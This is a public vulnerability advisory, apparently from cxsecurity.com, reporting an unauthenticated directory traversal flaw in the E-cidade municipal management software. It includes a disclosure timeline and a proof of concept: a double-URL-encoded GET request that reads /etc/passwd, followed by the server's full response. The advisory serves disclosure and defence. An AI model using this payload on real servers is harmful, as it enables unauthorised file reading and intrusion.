E-cidade - Directory Traversal vulnerability

2016.02.21
Credit: vesp3r
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Vendor: DBSeller (www.dbseller.com.br) Product: E-cidade - Software Publico de Gestão Municipal Published: 02/19/2016 Discovered by vesp3r (vesp3r7c3@gmail.com) Product Description -------------------- Intended to computerize the management of Brazilian Municipalities. This includes computerized integration between municipal entities: City Hall, Town Hall, Local Government, Foundations and others. The economy of resources is only one of the advantages in the adoption of e-cidade and the freedom of choice of suppliers and ensuring continuity of the system, once supported by the Ministry of Planning. Advisory Timeline ----------------- 02/18/2016 - Vendor notified 02/19/2016 - Vendor asked for more details 02/19/2016 - Information and PoC sent 02/20/2016 - Advisory was published Vulnerability ------------- An unauthenticated user is able to access files and directories, the vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple url encoding bypass(..%252f) Proof of Concept --------------- GET /e-cidade/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1 [Snip...] Accept-Encoding: gzip, deflate Connection: close Response: HTTP/1.1 200 OK Date: Fri, 19 Feb 2016 02:27:29 GMT Server: Apache/2.2.22 (Ubuntu) X-Powered-By: PHP/5.3.10-1ubuntu3.14 Vary: Accept-Encoding Content-Length: 1351 Connection: close Content-Type: text/plain; charset=ISO-8859-1 X-Pad: avoid browser bug root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false messagebus:x:102:105::/var/run/dbus:/bin/false whoopsie:x:103:108::/nonexistent:/bin/false landscape:x:104:110::/var/lib/landscape:/bin/false postgres:x:105:113:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin ecidade:x:1001:1001:eCidade,,,:/home/ecidade:/bin/bash dbseller:x:1000:1000:DBSeller,,,:/home/dbseller:/bin/bash postfix:x:107:116::/var/spool/postfix:/bin/false


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top